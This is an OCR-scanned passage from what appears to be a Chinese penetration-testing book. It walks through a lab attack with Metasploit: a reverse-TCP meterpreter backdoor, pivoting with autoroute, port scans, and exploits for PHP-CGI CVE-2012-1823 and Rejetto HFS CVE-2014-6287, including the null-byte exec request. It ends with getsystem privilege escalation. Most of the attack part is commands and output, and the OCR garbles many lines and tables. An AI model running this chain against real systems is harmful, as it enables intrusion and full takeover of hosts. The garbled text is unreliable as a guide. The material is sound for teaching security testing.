机 进行 通信 ， 还 需要 在 我 们 的 系统 上 启动 一 个 渗透 模块 控制 程序 ( handler )。 这 个 handler 的 IP 地 
址 和 端口 要 与 之 前 的 backdoor.elf 的 设置 相同 ，Metasploit 要 借助 这 个 handler 来 与 目标 通信 。 


msf > use exploit/multi/handler 

msf exploit(handler) > set payload linux/x86/meterpreter/reverse tcp 
payload => linux/x86/meterpreter/reverse tcp 
msf exploit(handler) > set LPORT 4444 

LPORT => 4444 

msf exploit(handler) > set LHOST 

set LHOST 192.168.10.118 

set LHOST fe80::a00:27ff:felb:9cf95ethO 

msf exploit(handler) » set LHOST 192.168.10.118 
LHOST => 192.168.10.118 

msf exploit(handler) » exploit 


[*] Started reverse TCP handler on 192.168.10.118:4444 
[*] Starting the payload handler... 


在 Metasploit 中 打开 一 个 单独 的 终端 窗口 ， 然后 输入 exploit/multi/handler 命 令 ， 将 攻 
击 载荷 的 类 型 设置 为 1inux/x86/meterpreter/reverse_tLcp。 接 下 来 使 用 命令 set LPORT 
4444 设 置 监 听 端 口 ， 使 用 set LHOST 来 将 IP 地 址 设 为 本 机 。 现 在 就 可 以 使 用 exploit 命 令 来 运 


行 这 个 模块 ， 只 需 等 待 和 目标 成 功 建立 连接 即 可 。 
当 目 标 计算 机 成 功 下 载 了 文件 之 后 ， 就 可 以 使 用 命令 chmod 提 供 一 个 合适 的 权限 ， 如 下 


Biz o 


赋予 了 777 权 限 之 后 就 可 以 对 所 有 文件 进行 读 、 


03:43:37 (55.91 MB/s) - '"backdoor.elf' saved [155/155] 


chmod 777 backdoor.elf 
./backdoor . elf 


着 渗透 模块 handler 的 终端 。 


图 


写 、 执 行 操作 。 现 在 执行 文件 ， 切 换 到 运行 
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msf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.118:4444 

[*] Starting the payload handler... 

[*] Transmitting intermediate stager for over-sized stage...(105 bytes) 

[*] Sending stage (1495599 bytes) to 192.168.10.112 

[*] Meterpreter session 1 opened (192.168.10.118:4444 -> 192.168.10.112:55169) a 
t 2016-03-21 08:08:15 -0400 


meterpreter > J 


干 得 不 错 ! 现在 我 们 已 经 获得 了 目标 系统 的 Meterpreter 权 限 。 接 下 来 使 用 后 渗透 模块 来 收集 
目标 系统 上 的 一 些 有 用 信息 。 


meterpreter > sysinfo 

Computer : metasploitable 

os : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 
UTC 2008 (i686) 

Architecture : i686 

Meterpreter : x86/linux 

meterpreter > lj 


执行 sysinfo 命 令 ， 可 以 看 到 这 个 目标 系统 的 名 称 为 metasploitable ( 这 是 一 个 特意 保留 了 很 
多 漏洞 的 计算 机 )， 架 构 为 i686， 内 核 版 本 为 2.6.24-16。 


接 下 来 执行 一 些 有 意思 的 命令 ， 以 便 控 掘 目 标 系 统 更 深层 的 信息 。 


meterpreter > ifconfig 


Interface 1 


Name : lo 

Hardware MAC : 00:00:00:00:00:00 
MTU : 16436 

Flags : UP LOOPBACK RUNNING 


IPv4 Address : 127.0.0.1 

IPv4 Netmask : 255.0.0.0 

IPv6 Address : ::1 

IPv6 Netmask : ffff:ffff:ffff:ffff:fffT:ffffT:ffffT:ffff 


Interface 2 


============ 

Name : etho 

Hardware MAC : 08:00:27:9b:25:a1 

MTU : 1500 

Flags : UP BROADCAST RUNNING MULTICAST 


IPv4 Address : 192.168.10.112 

IPv4 Netmask : 255.255.255.0 

IPv6 Address : fe80::a00:27ff:fe9b:25a1 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 


Interface 3 


Name : ethl 

Hardware MAC : 08:00:27:8d:0f:a8 

MTU : 1500 

Flags : UP BROADCAST RUNNING MULTICAST 


IPv4 Address : 192.168.20.5 

IPv4 Netmask : 255.255.255.0 

IPv6 Address : fe80::a00:27ff:fe8d:fas 
IPv6 Netmask : ffff:ffff:ffff:ffff:: 
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在 目标 系统 上 运行 ifconfig 命 令 ， 可 以 看 到 很 多 有 用 的 信息 ， 比 如 一 块 可 以 引导 我 们 进入 
目标 内 部 网 络 的 额外 网 卡 设备 。 接 下 来 运行 arp 命 令 , 查看 内 部 网 络 中 都 有 哪些 计算 机 已 经 与 目 
标 系统 建立 了 连接 ， 哪 些 还 没有 建立 连接 ， 得 到 的 结果 如 下 图 所 示 。 


meterpreter > arp 
ARP cache 


IP address MAC address Interface 


192.168.10.118 08:00:27:1b:9c:f9 ethO 
192.168.20.1 52:54:00:12:35:00 ethl 
192.168.20.4 08:00:27:ee:a5:07  ethl 


由 图 可 知 ， 目 标 网 络 中 存在 一 个 下地 址 为 192.168.20.4 的 主机 ， 这 是 一 个 内 部 网 络 的 主机 。 为 了 
渗透 进入 这 个 内 部 网 络 , 需要 在 已 经 成 功 渗透 的 主机 上 使 用 autoroute 命 令 来 设置 跳板 (pivoting )。 


> run autoroute -p 
[*] No routes have been added yet 
meterpreter > run autoroute -s 192.168.20.0 255.255.255.0 
[*] Adding a route to 192.168.20.0/255.255.255.0... 
Added route to 192.168.20.0/255.255.255.0 via 192.168.10.112 
[*] Use the -p option to list all active routes 


imeterpreter > run autoroute -p 


Active Routing Table 


192.168.20.0 255.255.255.0 Session 1 


meterpreter > B 


使 用 autoroute -p 命 令 可 以 打印 输出 所 有 的 路 由 信息 ， 从 中 可 知 默认 情况 下 是 没有 任何 路 
由 信息 的 。 现 在 向 目标 主机 添加 一 个 到 内 部 网 络 的 路 由 项 ， 添 加 命令 为 autoroute -s 
192.168.20.0 255.255.255.0。 输 入 这 条 命令 之 后 ， 就 可 以 看 到 这 个 路 由 项 已 经 成 功 添加 到 
目标 主机 的 路 由 表 中 。 现 在 我 们 的 Metasploit 就 可 以 通过 这 个 Meterpreter 会 话 连接 到 内 部 网 络 。 


使 用 background 命 令 将 这 个 Meterpreter 会 话 切换 到 后 台 。 


meterpreter > background 
[*] Backgrounding session 1... 
msf exploit(handler) > hosts 


Hosts 

address mac name os name os flavor os sp purpose info 
comments 

192.168.10.112  08:00:27:9b:25:al metasploitable Linux server 


msf exploit(handler) > B 
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既然 现在 已 经 可 以 连接 到 这 个 内 部 网 络 了 , 接 下 来 就 对 这 个 网 络 中 卫 地 址 为 192.168.20.4 的 主 
机 使 用 auxiliary/scanner/portscan/tcp 辅 助 模块 进行 一 次 端口 扫描 ， 结 果 如 下 图 所 示 。 


msf > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name I Current Setting Required Description 

CONCURRENCY 10 yes The number of concurrent ports to c 
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-90 
RHOSTS yes The target address range or CIDR id 
THREADS 1 yes The number of concurrent threads 
TIMEOUT 1000 yes The socket connect timeout in milli 


msf auxiliary(tcp) » setg RHOSTS 192.168.20.4 
RHOSTS -» 192.168.20.4 
msf auxiliary(tcp) > run 


[*] 192.168.20.4:25 - TCP OPEN 
[*] 192.168.20.4:23 - TCP OPEN 
[+] 192.168.20.4:22 - TCP OPEN 
[*] 192.168.20.4:21 - TCP OPEN 
[*] 192.168.20.4:53 - TCP OPEN 
[*] 192.168.20.4:80 - TCP OPEN 


如 果 想 使 用 这 个 端口 扫描 模块 的 话 ， 需 要 将 参数 RHOSTS 的 值 设置 为 目标 的 IP 地 址 ， 使 用 的 
命令 为 setg RHOSTS 192.168.20.4。 注 意 这 里 使 用 的 是 setg 命 令 ， 这 样 就 会 将 RHOSTS 的 值 
设置 为 全 局 的 192.168.20.4， 从 而 无 须 反 复 输入 这 个 命令 。 

输入 命令 才能 执行 这 个 模块 。 由 输出 可 知 ， 在 192.168.20.4 主 机 上 运行 着 很 多 服务 ， 而 且 这 


台 主 机 上 的 80 端 口 是 开 放 的 。 接 下 来 使 用 另外 一 个 辅助 模块 auxiliary/scanner/http/ 
httpb_version 来 检验 目标 主机 在 80 端 口上 运行 的 服务 ， 如 下 图 所 示 。 


msf > use auxiliary/scanner/http/http version 
msf auxiliary(http version) » show options 


Module options (auxiliary/scanner/http/http version): 


msf auxiliary(http version) > set RHOSTS 192.168.20.4 
RHOSTS -» 192.168.20.4 

msf auxiliary(http version) > 

msf auxiliary(http version) > run 


[*] 192.168.20.4:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 ) 
[*] Scanned 1 of 1 hosts (1005 complete) 

[*] Auxiliary module execution completed 

msf auxiliary(http version) > J 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOSTS yes The target address range or CIDR identifier 

RPORT 80 yes The target port 

THREADS 1 yes The number of concurrent threads 

VHOST no HTTP server virtual host 


该 


辅助 模块 成 功 运行 之 后 ,可 知 在 主机 80 端 口上 运行 的 正 是 最 为 流行 的 Apache 2.2.8 服 务 器 。 


通过 对 网 络 进行 研究 ， 我 们 发 现 其 中 的 PHP 5.2.4 版 本 是 存在 漏洞 的 ， 可 以 被 攻击 者 获取 对 目标 
系统 的 控制 。 
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1.13  PHP-CGI 查询 字符 串 参 数 漏洞 的 分 析 


目标 计算 机 上 的 漏洞 编号 为 CVE id 2012-1823 ， 完 整 的 名 称 为 PHP-CGI 查 询 字 符 串 参数 漏洞 
(PHP-CGI query string parameter vulnerability )。 根 据 PHP 主 页 的 信息 ， 当 PHP 使 用 基于 CGI 的 设置 
( 如 Apache 的 mod_cgid ) 时 ，php-cgi 就 会 接收 一 个 查询 字符 串 参数 作为 命令 行 参数 ( 这 个 命令 行 
参数 可 以 是 -s、-d 或 者 -c ), 它 将 会 被 传递 到 php-cgi 程 序 , 从 而 导致 源 代码 泄露 和 任意 代码 执行 。 
因此 , 一 个 远程 的 、 未 经 授权 的 攻击 者 可 以 借 此 获取 敏感 信息 , 利用 目标 计算 机 来 进行 DoS 攻 击 ， 
或 者 取得 Web 服 务 器 执行 任意 代码 的 权限 。 


当 访 问 http://localhost/index.php?-s 时 ， 该 漏洞 会 导致 源 代码 泄露 。 这 是 一 个 常见 示例 。 


有 关 该 渗透 模块 的 更 多 信息 ， 请 访问 https://www.rapid7.com/db/modules/ 
exploit/multi/http/php cgi arg injection/。 


渗透 模块 和 后 渗透 模块 
现在 来 收集 关于 这 个 漏洞 的 信息 。 首 先 查 找 Metasploit 中 与 这 个 漏洞 相 匹配 的 模块 。 


Imsf > search "php 5.2.4" 


接 下 来 就 可 以 在 匹配 模块 列表 中 找到 所 需 的 渗透 模块 ， 如 下 图 所 示 。 


2012-05-03 excellent PHP CGI Argument Injection 
现在 载 人 Metasploit 中 匹配 的 模块 来 对 这 个 漏洞 进行 渗透 ， 如 下 图 所 示 。 


msf auxiliary(http version) > use exploit/multi/http/php cgi arg injection 
msf exploit(php cgi arg injection) » show options 


Module options (exploit/multi/http/php cgi arg injection): 


Name Current Setting Required Description 

PLESK false yes Exploit Plesk 

Proxies no A proxy chain of format type:host:port[,type:host:port][. 
rel 

RHOST yes The target address 

RPORT 80 yes The target port 

TARGETURI no The URI to request (must be a CGI-handled PHP script) 

URIENCODING 60 yes Level of URI URIENCODING and padding (0 for minimum) 

VHOST no HTTP server virtual host 


Exploit target: 
Id Name 


0 Automatic 


msf exploit(php cgi arg injection) > 
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我 们 需要 为 这 个 渗透 模块 设置 所 有 所 需 的 值 ， 如 下 图 所 示 。 


RHOST => 192.168 


Name 
PLESK 
Proxies 

.] 
RHOST 
RPORT 
TARGETURI 
URIENCODING 
VHOST 


Exploit target: 
Id Name 


0 Automatic 


.20.4 


Current Setting 


192.168.20.4 
80 


9 


msf exploit(php cgi arg injection) > set RHOST 192.168.20.4 
msf exploit(php cgi arg injection) > show options 


Module options (exploit/multi/http/php cgi arg injection): 


Required Description 


Exploit Plesk 
A proxy chain of format t 


The target address 
The target port 


ype:host:port[,type:host:port][. 


The URI to request (must be a CGI-handled PHP script) 


Level of URI URIENCODING 
HTTP server virtual host 


msf exploit(php cgi arg injection) > show payloads 


and padding (0 for minimum) 


通过 输入 show payloaqs 命 令 ， 显 示 当 前 渗透 模块 可 以 使 用 的 攻击 载荷 ， 如 下 图 所 示 。 


|msf exploit(php cgi arg injection) > show payloads 
Compatible Payloads 

Name Disclosure Date Rank Description 

generic/custom normal Custom Payload 

generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inli 
ne 

generic/shell reverse tcp normal Generic Command Shell, Reverse TCP I 
nline 

php/bind perl normal PHP Command Shell, Bind TCP (via Per 
1) 

php/bind perl ipv6 normal PHP Command Shell, Bind TCP (via per 
1) IPv6 

php/bind_php normal PHP Command Shell, Bind TCP (via PHP 
) 

php/bind php_ipv6 normal PHP Command Shell, Bind TCP (via php 
) IPv6 

php/download exec normal PHP Executable Download and Execute 

php/exec normal PHP Execute Command 

php/meterpreter/bind tcp normal PHP Meterpreter, Bind TCP Stager 

php/meterpreter/bind tcp ipv6 normal PHP Meterpreter, Bind TCP Stager IPv 
6 

php/meterpreter/bind tcp ipv6 uuid normal PHP Meterpreter, Bind TCP Stager IPv 
6 with UUID Support 

php/meterpreter/bind tcp uuid normal PHP Meterpreter, Bind TCP Stager wit 
h UUID Support 

php/meterpreter/reverse tcp normal PHP Meterpreter, PHP Reverse TCP Sta 
ger 

php/meterpreter/reverse tcp uuid normal PHP Meterpreter, PHP Reverse TCP Sta 


上 面 的 截图 展示 了 大 量 可 以 使 用 的 攻击 载荷 ， 不 过 我 们 还 是 选择 了 一 个 比 generic/ 
shell bind tcpJtilidü JE SH sh X, SH XS ohp/meterpreter/reverse tcpJtilizkfn - 
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sf exploit(php cgi arg injection) > 

exploit(php cgi arg injection) » set payload php/meterpreter/reverse tcp 
ayload => php/meterpreter/reverse tcp 
msf exploit(php cgi arg injection) » show options 


Module options (exploit/multi/http/php cgi arg injection): 


Name Current Setting Required Description 

PLESK false yes Exploit Plesk 

Proxies no A proxy chain of format type:host:port[,type:host:port][. 
RHOST 192.168.20.4 yes The target address 

RPORT 80 yes The target port 

TARGETURI no The URI to request (must be a CGI-handled PHP script) 
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum) 
VHOST no HTTP server virtual host 


Payload options (php/meterpreter/reverse tcp): 


Name Current Setting Required Description 


LHOST yes The listen address 
LPORT 4444 yes The listen port 


Exploit target: 
Id Name 


0 Automatic 


最 后 ， 将 LHOST 参 数 的 值 设 定 为 本 机 的 IP 地 址 ， 如 下 图 所 示 。 


msf exploit(php cgi arg injection) > set LHOST 192.168.10.118 
LHOST => 192.168.10.118 
msf exploit(php cgi arg injection) > J 


现在 已 经 做 好 对 这 个 有 漏洞 的 服务 器 进行 渗透 的 所 有 准备 了 ， 接 下 来 输入 渗透 的 命令 。 


msf exploit(php cgi arg injection) > exploit 


[*] Started reverse TCP handler on 192.168.10.118:4444 

[*] Sending stage (33068 bytes) to 192.168.10.111 

[*] Meterpreter session 2 opened (192.168.10.118:4444 -» 192.168.10.111:6963) at 2016-03-21 09:49:04 
-0400 


meterpreter > 


I 


干 得 好 ! 我 们 现在 已 经 攻克 了 IP 地 址 为 192.168.20.4 的 内 部 系统 。 现 在 运行 几 个 后 渗透 命令 ， 
比如 说 getwa。 这 个 命令 其 实 和 pwa 很 像 ， 都 是 用 来 输出 当前 目录 的 。getuig 命 令 将 会 打印 输出 
我 们 所 控制 的 用 户 名 称 ，she11 命 令 用 来 获得 目标 系统 上 的 shell 控 什 


当 我 们 进入 了 shell 之 后 ， 就 可 以 运行 系统 命令 ( 比如 说 uname -a ) 来 查看 当前 系统 的 内 核 
版 本 。 同 样 也 可 使 用 wset 和 chmod 等 命令 。 还 可 以 像 我们 在 第 一 个 系统 中 做 的 那样 ， 将 shell 命 令 
行 升级 为 Meterpreter 命 令 行 。 下 面 的 截图 给 出 了 执行 这 些 命令 的 过 程 。 


c 


o 


AE 
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meterpreter > getwd 

/ var /www 

meterpreter » pwd 

/ var /www 

meterpreter > getuid 

Server username: www-data (33) 
meterpreter » shell 

Process 5060 created. 

Channel 9 created. 

uname -a 


Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 


如 果 想 要 使 用 PHP Meterpreter 获 得 一 个 更 高 级 别 的 控制 方式 ， 


仍然 可 以 使 用 Meterpreter 中 的 


wget 命 令 或 者 down1oad 命 令 将 这 个 backdoor.elf 文 件 下 载 到 目标 服务 器 上 。 M dae 


目标 计算 机 的 ARP 表 十 分 重要 ， 但 
好 的 访问 机 制 。 


在 目标 计算 机 上 执行 backdoorelf 文 件 ， 


是 我 们 无 法 使 用 PHP Meterpreter 做 到 这 一 


点 ， 因 此 需要 一 个 更 


这 将 会 提供 一 个 Meterpreter 控 制 ， 如 下 图 所 示 。 


meterpreter 
[-] Unknown 


» arp 
command: 
» arp 
command: 
» ifconfig 


[-] Unknown 
meterpreter 
[-] Unknown 
» shell 
Process 5070 created. 
Channel 1 created. 
./backdoor . elf 


arp. 
arp. 


command: ifconfig. 


在 一 个 独立 的 终端 中 运行 一 个 渗透 模块 handler， 


等 待 即将 到 来 的 连接 。 下 面 给 出 了 当 


backdoor.elf 文 件 执行 时 ， 后 门 程序 从 目标 连接 到 我 们 系统 时 的 截图 。 


msf exploit(handler) > exploit 


[*] Started reverse TCP handler on 192.168.10.118:4444 

[*] Starting the payload handler... 

[*] Transmitting intermediate stager for over-sized stage.. 
[*] Sending stage (1495599 bytes) to 192.168.10.111 

P 


400 
meterpreter > ifconfig 
N 
Interface 1 I 
Name : lo 
Hardware MAC : 00:00:00:00:00:00 
MTU : 16436 
Flags : UP LOOPBACK RUNNING 
IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 


IPv6 Address : ::1 
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff 


Interface 2 


Name : ethO 

Hardware MAC : 08:00:27:ee:a5:07 

MTU : 1500 

Flags : UP BROADCAST RUNNING MULTICAST 
IPv4 Address : 192.168.20.4 


IPv4 Netmask : 
IPv6 Address : 
IPv6 Netmask : 


255.255.255.0 
fe80::a00:27ff :feee:a507 
ffff:ffff:ffff:ffff:: 


meterpreter > J 


.(105 bytes) 


Meterpreter session 1 opened (192.168.10.118:4444 -> 192.168.10.111:6969) at 2016-03-21 09:56:05 


1.3. PHP-CGI 查询 字符 事 参 数 漏洞 的 分 析 33 


我 们 现在 已 经 搞定 了 第 二 台 计 算 机 。 接着 来 查看 其 ARP 表 中 的 内 容 , 以 便 顺 芯 摸 瓜 找 到 更 多 
的 计算 机 ， 下 面 给 出 了 网 络 信息 。 


meterpreter > arp 
ARP cache 


IP address MAC address Interface 
192.168.20.1 52:54:00:12:35:00 eth9 
192.168.20.5 08:00:27:8d:0f:a8 ethO 
192.168.20.6 08:00:27:ff:e0:ef ethO 


meterpreter > B 


我 们 在 ARP 表 中 找到 了 另外 一 台 位 于 内 部 网 络 、 卫 地 址 为 192.168.20.6 的 主机 。 不 过 现在 已 经 无 
须 再 添加 一 条 通 往 这 个 网 络 的 路 由 了 ， 因 为 我 们 已 经 在 第 一 台 主 机 上 添加 过 了 。 因此， 只 需要 切换 
回 Metasploit 命 令 行 即 可 。 到 现在 为 止 ， 我 们 已 经 拥有 了 三 个 不 同 的 Meterpreter 会 话 ， 如 下 图 所 示 。 


msf exploit(handler) > sessions -i 


Active sessions 


Id Type Information 
Connection 


Y meterpreter x86/linux uid=0, gid-0, euid-0, egid-0, suid-z0, sgid-0 @ meta 
sploitable 192.168.10.118:4444 -> 192.168.10.112:37067 (192.168.10.112) 
2 meterpreter php/php www-data (33) @ metasploitable 
192.168.10.118:4444 -» 192.168.10.111:6993 (192.168.20.4) 
4  meterpreter x86/linux uid=0, gid-0, euid-0, egid-0, suid-0, sgid-0 @ meta 
sploitable 192.168.10.118:4444 -> 192.168.10.111:7011 (192.168.20.4) 


msf exploit(handler) > M 


既然 已 经 有 了 一 条 通 往 新 发 现 主机 所 在 网 络 的 路 由 ， 那 么 就 对 192.168.20.6 这 台 主 机 进行 一 
次 TCP 端 口 扫描 吧 。 使 用 如 下 图 所 示 的 模块 auxiliary/scanner/portscan/tcp。 


psf > use auxiliary/scanner/portscan/tcp 
f auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 

CONCURRENCY 10 yes The number of concurrent ports to check per host 
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) 

RHOSTS yes The target address range or CIDR identifier 
THREADS 1 yes The number of concurrent threads I 
TIMEOUT 1000 yes The socket connect timeout in milliseconds 


sf auxiliary(tcp) > set RHOSTS 192.168.20.6 
Raosrs => 192.168.20.6 


msf auxiliary(tcp) > set THREADS 10 
[THREADS => 10 
msf auxiliary(tcp) > run 


[*] 192.168.20.6:21 - TCP OPEN 
[*] 192.168.20.6:80 - TCP OPEN 
[*] 192.168.20.6:135 - TCP OPEN 
[*] 192.168.20.6:139 - TCP OPEN 
[*] 192.168.20.6:445 - TCP OPEN 
[*] 192.168.20.6:5985 - TCP OPEN 

[*] 192.168.20.6:8080 - TCP OPEN 

[*] Scanned 1 of 1 hosts (100% complete) 
I*] Auxiliary module execution completed 
msf auxiliary(tcp) > 
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我 们 仅仅 看 到 了 少数 几 个 开放 的 端口 。 接 下 来 使 用 Metasploit 中 的 对 应 工具 对 常见 端口 再 进 
行 详细 的 扫描 。 使 用 auxiliary/scanner/http/http_header 辅 助 模块 对 目标 的 80 和 8080 端 


口 进行 扫描 ， 以 发 现在 这 两 个 端口 上 运行 的 服务 。 


HTTP METHOD => GET 


RPORT => 8080 


HIL-—-———-— 
**** 
本 


i * * 


msf » use auxiliary/scanner/http/http header 

msf auxiliary(http header) » set RHOSTS 192.168.20.6 
RHOSTS => 192.168.20.6 

msf auxiliary(http header) > set HTTP METHOD GET 


msf auxiliary(http header) > run 


[*] 192.168.20.6:80: CONTENT-TYPE: text/html I 

[*] 192.168.20.6:80: SERVER: Microsoft-IIS/8.5 

[*] 192.168.20.6:80: X-POWERED-BY: PHP/5.3.28, ASP.NET 
192.168.20.6:80: detected 3 headers 

[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 

msf auxiliary(http header) > set RPORT 8080 


msf auxiliary(http header) > run 


192.168.20.6:8080: 
192.168.20.6:8080: 
192.168.20.6:8080: 
192.168.20.6:8080: 
192.168.20.6:8080: 
Scanned 1 of 1 hosts (100% complete) 
Auxiliary module execution completed 
auxiliary(http header) > Bi 


CACHE-CONTROL: no-cache, no-store, must-revalidate, max-age--1 
CONTENT-TYPE: text/html 

SERVER: HFS 2.3 

SET-COOKIE: HFS_SID=0.586773571325466; pathz/; 

detected 4 headers 


从 上 面 的 截图 中 可 以 看 到 , 在 目标 计算 机 的 80 端 口上 运行 着 最 新 的 1IS 8.5。 这 是 一 个 很 难 渗 
透 的 服务 器 ， 因 为 并 没有 在 这 个 服务 器 上 发 现 高 危 的 漏洞 。 不过, 我 们 在 8080 端 口上 发 现 了 运行 
着 的 HFS 2.3， 这 个 软件 上 存在 着 一 个 远程 代码 执行 漏洞 。 


1.14 HFS 2.3 上 的 漏洞 分 析 


根据 CVE-2014-6287 的 描述 ，Rejetto 网 络 文件 服务 器 〈 也 被 称 为 HFS 或 者 HttpFileServer ) 的 
2.3x 版 本 (2.3c 以 前 的 版 本 ) 中 的 parserLib.pas 文 件 使 用 了 一 个 findqMacroMarkez 国 数 ， 该 漏洞 
源 于 parserLib.pas 文 件 没有 正确 处 理 空 字 节 。 远 程 攻击 者 可 借助 搜索 操作 中 的 %00 序 列 利 用 该 漏 


洞 执行 任意 程序 。 


下 面 给 出 了 这 个 有 漏洞 的 函数 : 


function findMacroMarker(s:string; ofs:integer-1):integer; 
begin result:-reMatch(s, 'N([.:1][.:1N2 INI ', 'm!', ofs) end; 


这 个 函数 不 能 正确 地 处 理 空 字 节 ， 所 以 当 我 们 对 http:/localhost:80/search=%00{ .exec|cmd.] 


发 起 请 求 时 ， 就 会 停止 对 宏 的 正则 解析 ， 从 而 导致 远程 代码 注入 。 


有 关 这 个 渗透 模块 的 更 多 信息 , 请 访问 https://wwwrapid7.com/db/modules/exploit/ 
windows/ http/rejetto hfs exec. 
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渗透 模块 和 后 渗透 模块 


现在 在 Metasploit 中 使 用 search 命 令 来 查找 和 HFS 2.3 服 务 器 上 漏洞 相 匹 配 的 渗透 模块 , 如 下 
图 所 示 。 


msf > search hfs 


Matching Modules 


Name Disclosure Date Rank Description 

exploit/multi/http/git client command exec 2014-12-18 excellent Malicious Git and Mercurial HTTP Server For CVE-201 
4-9390 

exploit/windows/http/rejetto hfs exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution 


msf » use exploit/windows/http/rejetto hfs exec 

sf exploit(rejetto hfs exec) > set RHOST 192.168.20.6 
OST => 192.168.20.6 

f exploit(rejetto hfs exec) > show payloads 


可 以 看 到 ，Metasploit 中 的 exploit/windows/http/rejetto_hfs_exec 模 块 可 以 匹配 这 
个 目标 漏洞 。 现 在 使 用 use 命 令 来 载 人 这 个 模块 ， 然 后 将 RHOST 参 数 的 值 设 定 为 目标 主机 的 IP， 
将 RPORT 的 值 设 定 为 8080。 还 必须 将 攻击 载 集 设置 为 vindows/meterpreter/reverse_tcp， 
将 HOsT 的 值 设置 为 我 们 的 IP 地 址 ，LPORT 的 值 设置 为 4444( 或 者 任何 可 以 使 用 的 端口 )。 当 所 有 
选项 都 设置 完成 之 后 ， 输 入 show options 命 令 来 检查 是 否 所 有 的 选项 都 设置 正确 。 


sf > use exploit/windows/http/rejetto hfs exec 
msf exploit(rejetto hfs exec) > show options 


Module options (exploit/windows/http/rejetto hfs exec): 


Name Current Setting Required Description 

HTTPDELAY 10 no Seconds tj wait before terminating web server 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST 192.168.20.6 yes The target address 

RPORT 80 yes The target port 

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 
SRVPORT 8080 yes The local port to listen on. 

SsLCert no Path to a custom SSL certificate (default is randomly generated) 
TARGETURI / yes The path of the web application 

URIPATH no The URI to use for this exploit (default is random) 

VHOST no HTTP server virtual host 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.168.10.118 yes The listen address 

LPORT 4444 yes The listen port 


Exploit target: 


Id Name 


© Automatic 


ORT => 8080 


fes exploit(rejetto hfs exec) » set RPORT 8080 
msf exploit(rejetto hfs exec) > exploit Bj 


模块 的 设置 已 经 完成 , 接 下 来 就 可 以 使 用 exploit 命 令 对 目标 系统 进行 渗透 了 ,如 下 图 所 示 。 
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[nsf exploit(rejetto_hfs_exec) > exploit 

[*] Started reverse TCP handler on 192.168.10.118:4444 

[*] Using URL: http://0.0.0.0:8080/gNfbmXQh 

[*] Local IP: http://192.168.10.118:8080/gNfbmXQh 

[*] Server started. 

[*] Sending a malicious request to / 

[*] 192.168.10.102  rejetto hfs exec - 192.168.20.6:8080 - Payload request received: /gNfbmXQh 

I*] Sending stage (957487 bytes) to 192.168.10.102 

[*] jeterpreter session 5 opened (192.168.10.118:4444 -> 192.168.10.102:25914) at 2016-03-22 05:58:11 -0400 
Fried to delete *sTEMP&XawrqMaIupYlo.vbs, unknown result 

[*] Server stopped. 


meterpreter > | | 


干 得 漂亮 ! REZ 


我 们 已 经 成 功 ] 


getsystem 命 令 提 升 控制 的 权限 。 从 下 图 可 以 看 出 ， 


径 搞 定 了 这 个 服务 器 。 接 下 来 进行 一 些 渗透 之 后 的 测试 任务 , 如 下 图 所 示 。 


meterpreter > syainto 


Computer WIN-3KOU2TIJ4EO 

os : Windows 2012 R2 (Build 9600). 
Architecture x64 (Current Process is WOW64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 6 

Meterpreter : x86/win32 


meterpreter > getuid 
Server username: WIN-3KOU2TIJ4EOV Administrator 


jmeterpreter > getsystem 
..got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 


Imeterpreter > getuid 
Server username: NT AUTHORITYXSYSTEM 


|meterpreter > | | 


地 以 管理 员 的 身份 获得 了 Windows Server 2012 系 统 的 权限 。 接 下 来 输入 一 个 
岗 在 的 权限 已 经 升级 为 系统 级 。 


接 下 来 对 目标 进行 更 深 的 渗透 ， 执 行 


J 一 些 基本 的 后 渗透 命令 ， 比 如 getpig 和 ps。ps 命 令 可 


以 显示 当前 正在 运行 的 进程 列表 , 而 getpia 命 令 可 以 输出 Meterpreter 正 在 驻 留 的 进程 号 , 如 下 图 


所 示 。 


meterpreter > getpid 
Current pid: 2036 
meterpreter » ps 
I 
PID  PPID Name Arch Session User Path 
0 [] [System Process] 
4 9 System x64 0 
228 4 Smss .exe x64 0 
264 464 svchost.exe x64 0 NT AUTHORITYXLOCAL SERVICE C:\Windows\System32\svchost.exe 
308 300 csrss.exe x64 0 
316 464  spoolsv.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\spoolsv.exe 
360 352  csrss.exe x64 1 
368 300  wininit.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\wininit.exe 
400 352  winlogon.exe x64 1 NT AUTHORITYASYSTEM C:\Windows\System32\winlogon.exe 
464 368  services.exe x64 0 
472 368 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 
528 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 
556 464  svchost.exe x64 0 NT AUTHORITYANETWORK SERVICE C:\Windows\System32\svchost.exe 
656 400  dwm.exe x64 1 Window ManagerXDWM-1 C: \Windows\ Sys tem32\dwm. exe 
668 464 VBoxService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\VBoxService.exe 
